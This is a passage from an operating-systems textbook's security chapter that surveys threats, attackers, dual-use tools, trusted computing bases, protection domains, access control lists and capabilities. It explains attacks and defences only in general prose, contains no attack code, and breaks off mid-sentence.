SECURITY


                                 9
                             SECURITY
Many companies possess valuable information they want to guard closely.
Among many things, this information can be technical (e.g., a new chip design or
software), commercial (e.g., studies of the competition or marketing plans), finan-
cial (e.g., plans for a stock offering) or legal (e.g., documents about a potential
merger or takeover). Most of this information is stored on computers. Home com-
puters increasingly have valuable data on them, too. Many people keep their finan-
cial information, including tax returns and credit card numbers, on their computer.
Love letters have gone digital.  And hard disks these days are full of important
photos, videos, and movies.
As more and more of this information is stored in computer systems, the need
to protect it is becoming increasingly important. Guarding the information against
unauthorized usage is therefore a major concern of all operating systems. Unfor-
tunately, it is also becoming increasingly difficult due to the widespread accept-
ance of system bloat (and the accompanying bugs) as a normal phenomenon.             In
this chapter we will examine computer security as it applies to operating systems.
The issues relating to operating system security have changed radically in the
past few decades.  Up until the early 1990s, few people had a computer at home
and most computing was done at companies, universities, and other organizations
on multiuser computers ranging from large mainframes to minicomputers. Nearly
all of these machines were isolated, not connected to any networks.  As a conse-
quence security was almost entirely focused on how to keep the users out of each
                                 593



594                               SECURITY                                     CHAP. 9
others' hair.  If Tracy and Camille were both registered users of the same computer
the trick was to make sure that neither could read or tamper with the other's files,
yet allow them to share those files they wanted shared. Elaborate models and
mechanisms were developed to make sure no user could get access rights he or she
was not entitled to.
     Sometimes the models and mechanisms involved classes of users rather than
just individuals. For example, on a military computer, data had to be markable as
top secret, secret, confidential, or public, and corporals had to be prevented from
snooping in generals' directories, no matter who the corporal was and who the gen-
eral was. All these themes were thoroughly investigated, reported on, and imple-
mented over a period of decades.
     An unspoken assumption was that once a model was chosen and an imple-
mentation made, the software was basically correct and would enforce whatever
the rules were. The models and software were usually pretty simple so the assump-
tion usually held. Thus if theoretically Tracy was not permitted to look at a certain
one of Camille's files, in practice she really could not do it.
     With the rise of the personal computer, tablets, smartphones and the Internet,
the situation changed. For instance, many devices have only one user, so the threat
of one user snooping on another user's files mostly disappears. Of course, this is
not true on shared servers (possibly in the cloud). Here, there is a lot of interest in
keeping users strictly isolated. Also, snooping still happens--in the network, for
example. If Tracy is on the same Wi-Fi networks as Camille, she can intercept all
of her network data. Modulo the Wi-Fi, this is not a new problem. More than 2000
years ago, Julius Caesar faced the same issue. Caesar needed to send messages to
his legions and allies, but there was always a chance that the message would be
intercepted by his enemies. To make sure his enemies would not be able to read his
commands, Caesar used encryption--replacing every letter in the message with the
letter that was three positions to the left of it in the alphabet. So a ``D'' became an
``A'', an ``E'' became a ``B'', and so on. While today's encryption techniques are
more sophisticated, the principle is the same: without knowledge of the key, the
adversary should not be able to read the message.
     Unfortunately, this does not always work, because the network is not the only
place where Tracy can snoop on Camille. If Tracy is able to hack into Camille's
computer, she can intercept all the outgoing messages before, and all incoming
messages after they are encrypted. Breaking into someone's computer is not al-
ways easy, but a lot easier than it should be (and typically a lot easier than cracking
someone's 2048 bit encryption key). The problem is caused by bugs in the soft-
ware on Camille's computer. Fortunately for Tracy, increasingly bloated operating
systems and applications guarantee that there is no shortage of bugs. When a bug is
a security bug, we call it a vulnerability.  When Tracy discovers a vulnerability in
Camille's software, she has to feed that software with exactly the right bytes to
trigger the bug. Bug-triggering input like this is usually called an exploit.  Often,
successful exploits allow attackers to take full control of the computer machine.



SEC. 9.1         THE SECURITY ENVIRONMENT                                                  595
Phrased differently: while Camille may think she is the only user on the computer,
she really is not alone at all!
Attackers may launch exploits manually or automatically, by means of a virus
or a worm.      The difference between a virus and worm is not always very clear.
Most people agree that a virus needs at least some user interaction to propagate.
For instance, the user should click on an attachment to get infected. Worms, on the
other hand, are self propelled. They will propagate regardless of what the user
does. It is also possible that a user willingly installs the attacker's code herself. For
instance, the attacker may repackage popular but expensive software (like a game
or a word processor) and offer it for free on the Internet. For many users, ``free'' is
irresistible. However, installing the free game automatically also installs additional
functionality, the kind that hands over the PC and everything in it to a cybercrimi-
nal far away. Such software is known as a Trojan horse, a subject we will discuss
shortly.
To cover all the bases, this chapter has two main parts. It starts by looking at
the security landscape in detail. We will look at threats and attackers (Sec. 9.1), the
nature of security and attacks (Sec. 9.2), different approaches to provide access
control (Sec. 9.3), and security models (Sec. 9.4).  In addition, we will look at
cryptography as a core approach to help provide security (Sec. 9.5) and different
ways to perform authentication (Sec. 9.6).
So far, so good. Then reality kicks in. The next four major sections are practi-
cal security problems that occur in daily life. We will talk about the tricks that at-
tackers use to take control over a computer system, as well as counter measures to
prevent this from happening. We will also discuss insider attacks and various kinds
of digital pests. We conclude the chapter with a short discussion of ongoing re-
search on computer security and finally a short summary.
Also worth noting is that while this is a book on operating systems, operating
systems security and network security are so intertwined that it is really impossible
to separate them. For example, viruses come in over the network but affect the op-
erating system.  On the whole, we have tended to err on the side of caution and in-
cluded some material that is germane to the subject but not strictly an operating
systems issue.
9.1 THE SECURITY ENVIRONMENT
Let us start our study of security by defining some terminology. Some people
use the terms ``security'' and ``protection'' interchangeably. Nevertheless, it is fre-
quently useful to make a distinction between the general problems involved in
making sure that files are not read or modified by unauthorized persons, which in-
clude technical, administrative, legal, and political issues, on the one hand, and the
specific operating system mechanisms used to provide security, on the other.               To
avoid confusion, we will use the term security to refer to the overall problem, and



596                               SECURITY                                      CHAP. 9
the term protection mechanisms to refer to the specific operating system mechan-
isms used to safeguard information in the computer. The boundary between them is
not well defined, however.  First we will look at security threats and attackers to
see what the nature of the problem is. Later on in the chapter we will look at the
protection mechanisms and models available to help achieve security.
9.1.1 Threats
     Many security texts decompose the security of an information system in three
components: confidentiality, integrity, and availability. Together, they are often
referred to as ``CIA.'' They are shown in Fig. 9-1 and constitute the core security
properties that we must protect against attackers and eavesdroppers--such as the
(other) CIA.
     The first, confidentiality, is concerned with having secret data remain secret.
More specifically, if the owner of some data has decided that these data are to be
made available only to certain people and no others, the system should guarantee
that release of the data to unauthorized people never occurs.  As an absolute mini-
mum, the owner should be able to specify who can see what, and the system
should enforce these specifications, which ideally should be per file.
                            Goal            Threat
               Confidentiality    Exposure of data
               Integrity          Tampering with data
               Availability       Denial of service
               Figure 9-1. Security goals and threats.
     The second property, integrity, means that unauthorized users should not be
able to modify any data without the owner's permission. Data modification in this
context includes not only changing the data, but also removing data and adding
false data. If a system cannot guarantee that data deposited in it remain unchanged
until the owner decides to change them, it is not worth much for data storage.
     The third property, availability, means that nobody can disturb the system to
make it unusable. Such denial-of-service attacks are increasingly common. For ex-
ample, if a computer is an Internet server, sending a flood of requests to it may
cripple it by eating up all of its CPU time just examining and discarding incoming
requests.  If it takes, say, 100 sec to process an incoming request to read a Web
page, then anyone who manages to send 10,000 requests/sec can wipe it out. Rea-
sonable models and technology for dealing with attacks on confidentiality and in-
tegrity are available; foiling denial-of-service attacks is much harder.
     Later on, people decided that three fundamental properties were not enough for
all possible scenarios, and so they added additional ones, such as authenticity,
accountability, nonrepudiability, privacy, and others. Clearly, these are all nice to



SEC. 9.1                   THE SECURITY ENVIRONMENT                                     597
have. Even so, the original three still have a special place in the hearts and minds
of most (elderly) security experts.
Systems are under constant threat from attackers. For instance, an attacker may
sniff the traffic on a local area network and break the confidentiality of the infor-
mation, especially if the communication protocol does not use encryption. Like-
wise, an intruder may attack a database system and remove or modify some of the
records, breaking their integrity. Finally, a judiciously placed denial-of-service at-
tack may destroy the availability of one or more computer systems.
There are many ways in which an outsider can attack a system; we will look at
some of them later in this chapter. Many of the attacks nowadays are supported by
highly advanced tools and services. Some of these tools are built by so-called
``black-hat'' hackers, others by ``white hats.'' Just like in the old Western movies,
the bad guys in the digital world wear black hats and ride Trojan horses--the good
hackers wear white hats and code faster than their shadows.
Incidentally, the popular press tends to use the generic term ``hacker'' exclu-
sively for the black hats. However, within the computer world, ``hacker'' is a term
of honor reserved for great programmers. While some of these are rogues, most are
not. The press got this one wrong. In deference to true hackers, we will use the
term in the original sense and will call people who try to break into computer sys-
tems where they do not belong either crackers or black hats.
Going back to the attack tools, it may come as a surprise that many of them are
developed by white hats. The explanation is that, while the baddies may (and do)
use them also, these tools primarily serve as convenient means to test the security
of a computer system or network. For instance, a tool like nmap helps attackers de-
termine the network services offered by a computer system by means of a port-
scan.  One of the simplest scanning techniques offered by nmap is to try and set up
TCP connections to every possible port number on a computer system. If the con-
nection setup to a port succeeds, there must be a server listening on that port.
Moreover, since many services use well-known port numbers, it allows the security
tester (or attacker) to find out in detail what services are running on a machine.
Phrased differently, nmap is useful for attackers as well as defenders, a property
that is known as dual use.  Another set of tools, collectively referred to as dsniff,
offers a variety of ways to monitor network traffic and redirect network packets.
The Low Orbit Ion Cannon (LOIC), meanwhile, is not (just) a SciFi weapon to
vaporize enemies in a galaxy far away, but also a tool to launch denial-of-service
attacks. And with the Metasploit framework that comes preloaded with hundreds
of convenient exploits against all sorts of targets, launching attacks was never easi-
er. Clearly, all these tools have dual-use issues. Like knives and axes, it does not
mean they are bad per se.
However, cybercriminals also offer a wide range of (often online) services to
wannabe cyber kingpins: to spread malware, launder money, redirect traffic, pro-
vide hosting with a no-questions-asked policy, and many other useful things. Most
criminal activities on the Internet build on infrastructures known as botnets that



598                                      SECURITY                               CHAP. 9
consist of thousands (and sometimes millions) of compromised computers--often
normal computers of innocent and ignorant users. There are all-too-many ways in
which attackers can compromise a user's machine. For instance, they may offer
free, but malicious versions of popular software. The sad truth is that the promise
of free (``cracked'') versions of expensive software is irresistible to many users.
Unfortunately, the installation of such programs gives the attacker full access to the
machine. It is like handing over the key to your house to a perfect stranger. When
the computer is under control of the attacker, it is known as a bot or zombie. Typi-
cally, none of this is visible to the user. Nowadays, botnets consisting of hundreds
of thousands of zombies are the workhorses of many criminal activities. A few
hundred thousand PCs are a lot of machines to pilfer for banking details, or to use
for spam, and just think of the carnage that may ensue when a million zombies aim
their LOIC weapons at an unsuspecting target.
     Sometimes, the effects of the attack go well beyond the computer systems
themselves and reach directly into the physical world. One example is the attack on
the waste management system of Maroochy Shire, in Queensland, Australia--not
too far from Brisbane. A disgruntled ex-employee of a sewage system installation
company was not amused when the Maroochy Shire Council turned down his job
application and he decided not to get mad, but to get even. He took control of the
sewage system and caused a million liters of raw sewage to spill into the parks,
rivers and coastal waters (where fish promptly died)--as well as other places.
     More generally, there are folks out there who bear a grudge against some par-
ticular country or (ethnic) group or who are just angry at the world in general and
want to destroy as much infrastructure as they can without too much regard to the
nature of the damage or who the specific victims are. Usually such people feel that
attacking their enemies' computers is a good thing, but the attacks themselves may
not be well targeted.
     At the opposite extreme is cyberwarfare.      A cyberweapon commonly referred
to as Stuxnet physically damaged the centrifuges in a uranium enrichment facility
in Natanz, Iran, and is said to have caused a significant slowdown in Iran's nuclear
program. While no one has come forward to claim credit for this attack, something
that sophisticated probably originated with the secret services of one or more coun-
tries hostile to Iran.
     One important aspect of the security problem, related to confidentiality, is pri-
vacy: protecting individuals from misuse of information about them. This quickly
gets into many legal and moral issues. Should the government compile dossiers on
everyone in order to catch X-cheaters, where X is ``welfare'' or ``tax,'' depending
on your politics? Should the police be able to look up anything on anyone in order
to stop organized crime?  What about the U.S. National Security Agency's moni-
toring millions of cell phones daily in the hope of catching would-be terrorists?
Do employers and insurance companies have rights?  What happens when these
rights conflict with individual rights?  All of these issues are extremely important
but are beyond the scope of this book.



SEC. 9.1                   THE SECURITY ENVIRONMENT                                      599
9.1.2 Attackers
     Most people are pretty nice and obey the law, so why worry about security?
Because there are unfortunately a few people around who are not so nice and want
to cause trouble (possibly for their own commercial gain).     In the security litera-
ture, people who are nosing around places where they have no business being are
called attackers, intruders, or sometimes adversaries. A few decades ago, crack-
ing computer systems was all about showing your friends how clever you were, but
nowadays this is no longer the only or even the most important reason to break into
a system. There are many different types of attacker with different kinds of moti-
vation: theft, hacktivism, vandalism, terrorism, cyberwarfare, espionage, spam, ex-
tortion, fraud--and occasionally the attacker still simply wants to show off, or
expose the poor security of an organization.
     Attackers  similarly  range  from  not   very    skilled  wannabe  black  hats,     also
referred to as script-kiddies, to extremely skillful crackers. They may be profes-
sionals working for criminals, governments (e.g., the police, the military, or the
secret services), or security firms--or hobbyists that do all their hacking in their
spare time.  It should be clear that trying to keep a hostile foreign government from
stealing military secrets is quite a different matter from trying to keep students
from inserting a funny message-of-the-day into the system. The amount of effort
needed for security and protection clearly depends on who the enemy is thought to
be.
9.2 OPERATING SYSTEMS SECURITY
     There are many ways to compromise the security of a computer system. Often
they are not sophisticated at all. For instance, many people set their PIN codes to
0000, or their password to ``password''--easy to remember, but not very secure.
There are also people who do the opposite. They pick very complicated passwords,
so that they cannot remember them, and have to write them down on a Post-it note
which they attach to their screen or keyboard. This way, anyone with physical ac-
cess to the machine (including the cleaning staff, secretary, and all visitors) also
has access to everything on the machine. There are many other examples, and they
include high-ranking officials losing USB sticks with sensitive information, old
hard drives with trade secrets that are not properly wiped before being dropped in
the recycling bin, and so on.
     Nevertheless, some of the most important security incidents are due to sophis-
ticated cyber attacks. In this book, we are specifically interested in attacks that are
related to the operating system. In other words, we will not look at Web attacks, or
attacks on SQL databases. Instead, we focus on attacks where the operating system
is either the target of the attack or plays an important role in enforcing (or more
commonly, failing to enforce) the security policies.



600                                    SECURITY                                CHAP. 9
     In general, we distinguish between attacks that passively try to steal infor-
mation and attacks that actively try to make a computer program misbehave. An
example of a passive attack is an adversary that sniffs the network traffic and tries
to break the encryption (if any) to get to the data. In an active attack, the intruder
may take control of a user's Web browser to make it execute malicious code, for
instance to steal credit card details. In the same vein, we distinguish between cryp-
tography, which is all about shuffling a message or file in such a way that it be-
comes hard to recover the original data unless you have the key, and software
hardening, which adds protection mechanisms to programs to make it hard for at-
tackers to make them misbehave. The operating system uses cryptography in many
places: to transmit data securely over the network, to store files securely on disk, to
scramble the passwords in a password file, etc. Program hardening is also used all
over the place: to prevent attackers from injecting new code into running software,
to make sure that each process has exactly those privileges it needs to do what it is
supposed to do and no more, etc.
9.2.1 Can We Build Secure Systems?
     Nowadays, it is hard to open a newspaper without reading yet another story
about  attackers  breaking  into   computer  systems,  stealing  information,  or  con-
trolling millions of computers. A naive person might logically ask two questions
concerning this state of affairs:
       1.  Is it possible to build a secure computer system?
       2.  If so, why is it not done?
The answer to the first one is: ``In theory, yes.'' In principle, software can be free
of bugs and we can even verify that it is secure--as long as that software is not too
large or complicated. Unfortunately, computer systems today are horrendously
complicated and this has a lot to do with the second question. The second question,
why secure systems are not being built, comes down to two fundamental reasons.
First, current systems are not secure but users are unwilling to throw them out. If
Microsoft were to announce that in addition to Windows it had a new product,
SecureOS, that was resistant to viruses but did not run Windows applications, it is
far from certain that every person and company would drop Windows like a hot
potato and buy the new system immediately. In fact, Microsoft has a secure OS
(Fandrich et al., 2006) but is not marketing it.
     The second issue is more subtle. The only known way to build a secure system
is to keep it simple.  Features are the enemy of security.       The good folks in the
Marketing Dept. at most tech companies believe (rightly or wrongly) that what
users want is more features, bigger features, and better features.  They make sure
that the system architects designing their products get the word. However, all these
mean more complexity, more code, more bugs, and more security errors.



SEC. 9.2                  OPERATING SYSTEMS SECURITY                                    601
Here are two fairly simple examples. The first email systems sent messages as
ASCII text. They were simple and could be made fairly secure. Unless there are
really dumb bugs in the email program, there is little an incoming ASCII message
can do to damage a computer system (we will actually see some attacks that may
be possible later in this chapter). Then people got the idea to expand email to in-
clude other types of documents, for example, Word files, which can contain pro-
grams in macros. Reading such a document means running somebody else's pro-
gram on your computer. No matter how much sandboxing is used, running a for-
eign program on your computer is inherently more dangerous than looking at
ASCII text. Did users demand the ability to change email from passive documents
to active programs? Probably not, but somebody thought it would be a nifty idea,
without worrying too much about the security implications.
The second example is the same thing for Web pages. When the Web consisted
of passive HTML pages, it did not pose a major security problem. Now that many
Web pages contain programs (applets and JavaScript) that the user has to run to
view the content, one security leak after another pops up.        As soon as one is fixed,
another takes its place.  When the Web was entirely static, were users up in arms
demanding dynamic content?    Not that the authors remember, but its introduction
brought with it a raft of security problems.  It looks like the Vice-President-In-
Charge-Of-Saying-No was asleep at the wheel.
Actually, there are some organizations that think good security is more impor-
tant than nifty new features, the military being the prime example. In the following
sections we will look some of the issues involved, but they can be summarized in
one sentence.  To build a secure system, have a security model at the core of the
operating system that is simple enough that the designers can actually understand
it, and resist all pressure to deviate from it in order to add new features.
9.2.2 Trusted Computing Base
In the security world, people often talk about trusted systems rather than
secure systems. These are systems that have formally stated security requirements
and meet these requirements.  At the heart of every trusted system is a minimal
TCB (Trusted Computing Base) consisting of the hardware and software neces-
sary for enforcing all the security rules. If the trusted computing base is working to
specification, the system security cannot be compromised, no matter what else is
wrong.
The TCB typically consists of most of the hardware (except I/O devices that do
not affect security), a portion of the operating system kernel, and most or all of the
user programs that have superuser power (e.g., SETUID root programs in UNIX).
Operating system functions that must be part of the TCB include process creation,
process switching, memory management, and part of file and I/O management.              In
a secure design, often the TCB will be quite separate from the rest of the operating
system in order to minimize its size and verify its correctness.



602                                SECURITY                                 CHAP. 9
     An important part of the TCB is the reference monitor, as shown in Fig. 9-2.
The reference monitor accepts all system calls involving security, such as opening
files, and decides whether they should be processed or not. The reference monitor
thus allows all the security decisions to be put in one place, with no possibility of
bypassing it. Most operating systems are not designed this way, which is part of the
reason they are so insecure.
                                                 User process
                                                                            User
                                                                            space
                                   All system calls go through the
                                   reference monitor for security checking
                              Reference monitor                             Kernel
       Trusted computing base                                               space
       Operating system kernel
                              Figure 9-2. A reference monitor.
     One of the goals of some current security research is to reduce the trusted com-
puting base from millions of lines of code to merely tens of thousands of lines of
code.  In Fig. 1-26 we saw the structure of the MINIX 3 operating system, which is
a POSIX-conformant system but with a radically different structure than Linux or
FreeBSD. With MINIX 3, only about 10.000 lines of code run in the kernel. Every-
thing else runs as a set of user processes.      Some of these, like the file system and
the process manager, are part of the trusted computing base since they can easily
compromise system security. But other parts, such as the printer driver and the
audio driver, are not part of the trusted computing base and no matter what is
wrong with them (even if they are taken over by a virus), there is nothing they can
do to compromise system security.  By reducing the trusted computing base by two
orders of magnitude, systems like MINIX 3 can potentially offer much higher secu-
rity than conventional designs.
9.3 CONTROLLING ACCESS TO RESOURCES
     Security is easier to achieve if there is a clear model of what is to be protected
and who is allowed to do what. Quite a bit of work has been done in this area, so
we can only scratch the surface in this brief treatment. We will focus on a few gen-
eral models and the mechanisms for enforcing them.



SEC. 9.3              CONTROLLING ACCESS TO RESOURCES                                    603
9.3.1 Protection Domains
A computer system contains many resources, or ``objects,'' that need to be pro-
tected. These objects can be hardware (e.g., CPUs, memory pages, disk drives, or
printers) or software (e.g., processes, files, databases, or semaphores).
Each object has a unique name by which it is referenced, and a finite set of op-
erations that processes are allowed to carry out on it. The read and write operations
are appropriate to a file; up and down make sense on a semaphore.
It is obvious that a way is needed to prohibit processes from accessing objects
that they are not authorized to access. Furthermore, this mechanism must also
make it possible to restrict processes to a subset of the legal operations when that is
needed. For example, process A may be entitled to read, but not write, file F.
In order to discuss different protection mechanisms, it is useful to introduce the
concept of a domain.     A domain is a set of (object, rights) pairs. Each pair speci-
fies an object and some subset of the operations that can be performed on it.            A
right in this context means permission to perform one of the operations. Often a
domain corresponds to a single user, telling what the user can do and not do, but a
domain can also be more general than just one user. For example, the members of a
programming team working on some project might all belong to the same domain
so that they can all access the project files.
How objects are allocated to domains depends on the specifics of who needs to
know what. One basic concept, however, is the POLA (Principle of Least Auth-
ority) or need to know.  In general, security works best when each domain has the
minimum objects and privileges to do its work--and no more.
Figure 9-3 shows three domains, showing the objects in each domain and the
rights (Read, Write, eXecute) available on each object. Note that Printer1 is in two
domains at the same time, with the same rights in each.         File1 is also in two do-
mains, with different rights in each one.
          Domain 1                              Domain 2  Domain 3
          File1[ R ]      File1[ RW ]                           File6 [ RW X ]
                          File4[ RW X ]         Printer1 [ W]
          File2 [ RW ]    File5[ RW ]                           Plotter2 [ W]
                         Figure 9-3. Three protection domains.
At every instant of time, each process runs in some protection domain.                   In
other words, there is some collection of objects it can access, and for each object it
has some set of rights. Processes can also switch from domain to domain during
execution. The rules for domain switching are highly system dependent.



604                                   SECURITY                                   CHAP. 9
     To make the idea of a protection domain more concrete, let us look at UNIX
(including Linux, FreeBSD, and friends).     In UNIX, the domain of a process is de-
fined by its UID and GID.  When a user logs in, his shell gets the UID and GID
contained in his entry in the password file and these are inherited by all its chil-
dren.   Given any (UID, GID) combination, it is possible to make a complete list of
all objects (files, including I/O devices represented by special files, etc.) that can be
accessed, and whether they can be accessed for reading, writing, or executing. Two
processes with the same (UID, GID) combination will have access to exactly the
same set of objects. Processes with different (UID, GID) values will have access to
a different set of files, although there may be considerable overlap.
     Furthermore, each process in UNIX has two halves: the user part and the ker-
nel part. When the process does a system call, it switches from the user part to the
kernel part. The kernel part has access to a different set of objects from the user
part. For example, the kernel can access all the pages in physical memory, the en-
tire disk, and all the other protected resources. Thus, a system call causes a domain
switch.
     When a process does an exec on a file with the SETUID or SETGID bit on, it
acquires a new effective UID or GID.  With a different (UID, GID) combination, it
has a different set of files and operations available. Running a program with
SETUID or SETGID is also a domain switch, since the rights available change.
     An important question is how the system keeps track of which object belongs
to which domain. Conceptually, at least, one can envision a large matrix, with the
rows being domains and the columns being objects. Each box lists the rights, if
any, that the domain contains for the object.   The matrix for Fig. 9-3 is shown in
Fig. 9-4.  Given this matrix and the current domain number, the system can tell if
an access to a given object in a particular way from a specified domain is allowed.
                                             Object
           File1  File2    File3      File4          File5   File6     Printer1  Plotter2
Domain
       1   Read   Read
                  Write
                                      Read           Read
       2                   Read       Write          Write             Write
                                      Execute
                                                             Read
       3                                                     Write     Write     Write
                                                             Execute
                           Figure 9-4. A protection matrix.
     Domain switching itself can be easily included in the matrix model by realiz-
ing that a domain is itself an object, with the operation enter.    Figure 9-5 shows the
matrix of Fig. 9-4 again, only now with the three domains as objects themselves.
Processes in domain 1 can switch to domain 2, but once there, they cannot go back.



SEC. 9.3                 CONTROLLING ACCESS TO RESOURCES                                       605
This situation models executing a SETUID program in UNIX.                    No       other    domain
switches are permitted in this example.
                                                Object
          File1  File2   File3  File4    File5  File6    Printer1  Plotter2  Domain1  Domain2  Domain3
Domain
      1   Read   Read                                                                 Enter
                 Write
                                Read     Read
      2                  Read   Write    Write           Write
                                Execute
                                                Read
      3                                         Write    Write     Write
                                                Execute
                 Figure 9-5. A protection matrix with domains as objects.
9.3.2 Access Control Lists
      In practice, actually storing the matrix of Fig. 9-5 is rarely done because it is
large and sparse. Most domains have no access at all to most objects, so storing a
very large, mostly empty, matrix is a waste of disk space. Two methods that are
practical, however, are storing the matrix by rows or by columns, and then storing
only the nonempty elements. The two approaches are surprisingly different.                     In this
section we will look at storing it by column; in the next we will study storing it by
row.
      The first technique consists of associating with each object an (ordered) list
containing all the domains that may access the object, and how. This list is called
the ACL (Access Control List) and is illustrated in Fig. 9-6.                Here we see three
processes, each belonging to a different domain, A, B, and C, and three files F1,
F2, and F3. For simplicity, we will assume that each domain corresponds to exact-
ly one user, in this case, users A, B, and C. Often in the security literature the users
are called subjects or principals, to contrast them with the things owned, the
objects, such as files.
      Each file has an ACL associated with it. File F1 has two entries in its ACL
(separated by a semicolon).     The first entry says that any process owned by user A
may read and write the file. The second entry says that any process owned by user
B may read the file. All other accesses by these users and all accesses by other
users are forbidden.     Note that the rights are granted by user, not by process.             As
far as the protection system goes, any process owned by user A can read and write
file F1.  It does not matter if there is one such process or 100 of them.                      It is the
owner, not the process ID, that matters.
      File F2 has three entries in its ACL: A, B, and C can all read the file, and B can
also write it.   No other accesses are allowed.          File F3 is apparently an executable
program, since B and C can both read and execute it. B can also write it.



606                                      SECURITY                               CHAP. 9
                          Owner
     Process
                       A                 B               C                      User
                                                                                space
         File   F1        A: RW;  B: R              ACL
                F2        A: R;   B:RW;  C:R                                    Kernel
                                                                                space
                F3        B:RWX;  C: RX
                Figure 9-6. Use of access control lists to manage file access.
     This example illustrates the most basic form of protection with ACLs.      More
sophisticated systems are often used in practice. To start with, we have shown only
three rights so far: read, write, and execute. There may be additional rights as well.
Some of these may be generic, that is, apply to all objects, and some may be object
specific. Examples of generic rights are destroy object and copy object.        These
could hold for any object, no matter what type it is. Object-specific rights might in-
clude append message for a mailbox object and sort alphabetically for a directory
object.
     So far, our ACL entries have been for individual users. Many systems support
the concept of a group of users. Groups have names and can be included in ACLs.
Two variations on the semantics of groups are possible.     In some systems, each
process has a user ID (UID) and group ID (GID).          In such systems, an ACL entry
contains entries of the form
     UID1, GID1: rights1; UID2, GID2: rights2; ...
Under these conditions, when a request is made to access an object, a check is
made using the caller's UID and GID.          If they are present in the ACL, the rights
listed are available.     If the (UID, GID) combination is not in the list, the access is
not permitted.
     Using groups this way effectively introduces the concept of a role.        Consider a
computer installation in which Tana is system administrator, and thus in the group
sysadm.        However, suppose that the company also has some clubs for employees
and Tana is a member of the pigeon fanciers club. Club members belong to the
group pigfan and have access to the company's computers for managing their
pigeon database. A portion of the ACL might be as shown in Fig. 9-7.
     If Tana tries to access one of these files, the result depends on which group she
is currently logged in as. When she logs in, the system may ask her to choose
which of her groups she is currently using, or there might even be different login



SEC. 9.3             CONTROLLING ACCESS TO RESOURCES                                     607
               File              Access control list
               Password          tana, sysadm: RW
               Pigeon      data  bill, pigfan: RW;  tana, pigfan: RW; ...
                              Figure 9-7. Two access control lists.
names and/or passwords to keep them separate. The point of this scheme is to pre-
vent Tana from accessing the password file when she currently has her pigeon
fancier's hat on. She can do that only when logged in as the system administrator.
In some cases, a user may have access to certain files independent of which
group she is currently logged in as. That case can be handled by introducing the
concept of a wildcard, which means everyone. For example, the entry
tana, *: RW
for the password file would give Tana access no matter which group she was cur-
rently in as.
Yet another possibility is that if a user belongs to any of the groups that have
certain access rights, the access is permitted.  The advantage here is that a user be-
longing to multiple groups does not have to specify which group to use at login
time. All of them count all of the time.  A disadvantage of this approach is that it
provides less encapsulation: Tana can edit the password file during a pigeon club
meeting.
The use of groups and wildcards introduces the possibility of selectively block-
ing a specific user from accessing a file. For example, the entry
virgil, *: (none); *, *: RW
gives the entire world except for Virgil read and write access to the file. This works
because the entries are scanned in order, and the first one that applies is taken; sub-
sequent entries are not even examined.    A match is found for Virgil on the first
entry and the access rights, in this case, ``none'' are found and applied. The search
is terminated at that point.  The fact that the rest of the world has access is never
even seen.
The other way of dealing with groups is not to have ACL entries consist of
(UID, GID) pairs, but to have each entry be a UID or a GID.                For example, an
entry for the file pigeon  data could be
debbie: RW;    phil: RW;      pigfan: RW
meaning that Debbie and Phil, and all members of the pigfan group have read and
write access to the file.
It sometimes occurs that a user or a group has certain permissions with respect
to a file that the file owner later wishes to revoke. With access-control lists, it is
relatively straightforward to revoke a previously granted access. All that has to be



608                             SECURITY                                            CHAP. 9
done is edit the ACL to make the change.  However, if the ACL is checked only
when a file is opened, most likely the change will take effect only on future calls to
open.  Any file that is already open will continue to have the rights it had when it
was opened, even if the user is no longer authorized to access the file.
9.3.3 Capabilities
     The other way of slicing up the matrix of Fig. 9-5 is by rows. When this meth-
od is used, associated with each process is a list of objects that may be accessed,
along with an indication of which operations are permitted on each, in other words,
its domain. This list is called a capability list (or C-list) and the individual items
on it are called capabilities (Dennis and Van Horn, 1966; Fabry, 1974).             A set of
three processes and their capability lists is shown in Fig. 9-8.
                         Owner
     Process
              A                       B      C                                      User
                                                                                    space
       F1     F1:R              F1:R         F2:R
       F2     F2:R              F2:RW        F3:RX                                  Kernel
                                F3:RWX                                              space
       F3                                                              C-list
       Figure 9-8. When capabilities are used, each process has a capability list.
     Each capability grants the owner certain rights on a certain object.           In Fig. 9-8,
the process owned by user A can read files F1 and F2, for example. Usually, a
capability consists of a file (or more generally, an object) identifier and a bitmap
for the various rights.  In a UNIX-like system, the file identifier would probably be
the i-node number. Capability lists are themselves objects and may be pointed to
from other capability lists, thus facilitating sharing of subdomains.
     It is fairly obvious that capability lists must be protected from user tampering.
Three methods of protecting them are known.  The first way requires a tagged
architecture, a hardware design in which each memory word has an extra (or tag)
bit that tells whether the word contains a capability or not. The tag bit is not used
by arithmetic, comparison, or similar ordinary instructions, and it can be modified
only by programs running in kernel mode (i.e., the operating system).               Tagged-ar-
chitecture machines have been built and can be made to work well (Feustal, 1972).
The IBM AS/400 is a popular example.



SEC. 9.3      CONTROLLING ACCESS TO RESOURCES                                               609
The second way is to keep the C-list inside the operating system. Capabilities
are then referred to by their position in the capability list.        A process might say:
``Read 1 KB from the file pointed to by capability 2.'' This form of addressing is
similar to using file descriptors in UNIX.      Hydra (Wulf et al., 1974) worked this
way.
The third way is to keep the C-list in user space, but manage the capabilities
cryptographically so that users cannot tamper with them. This approach is particu-
larly suited to distributed systems and works as follows. When a client process
sends a message to a remote server, for example, a file server, to create an object
for it, the server creates the object and generates a long random number, the check
field, to go with it. A slot in the server's file table is reserved for the object and the
check field is stored there along with the addresses of the disk blocks. In UNIX
terms, the check field is stored on the server in the i-node. It is not sent back to the
user and never put on the network.         The       server  then  generates  and       returns  a
capability to the user of the form shown in Fig. 9-9.
      Server               Object  Rights                    f(Objects, Rights, Check)
              Figure 9-9. A cryptographically protected capability.
The capability returned to the user contains the server's identifier, the object
number (the index into the server's tables, essentially, the i-node number), and the
rights, stored as a bitmap. For a newly created object, all the rights bits are turned
on, of course, because the owner can do everything. The last field consists of the
concatenation of the object, rights, and check field run through a cryptographically
secure one-way function, f. A cryptographically secure one-way function is a func-
tion y = f (x) that has the property that given x it is easy to find y, but given y it is
computationally infeasible to find x. We will discuss them in detail in Section 9.5.
For now, it suffices to know that with a good one-way function, even a determined
attacker will not be able to guess the check field, even if he knows all the other
fields in the capability.
When the user wishes to access the object, she sends the capability to the ser-
ver as part of the request. The server then extracts the object number to index into
its tables to find the object.     It then computes  f (Object, Rights, Check), taking the
first two parameters from the capability itself and the third from its own tables.               If
the result agrees with the fourth field in the capability, the request is honored;
otherwise, it is rejected.  If a user tries to access someone else's object, he will not
be able to fabricate the fourth field correctly since he does not know the check
field, and the request will be rejected.
A user can ask the server to produce a weaker capability, for example, for read-
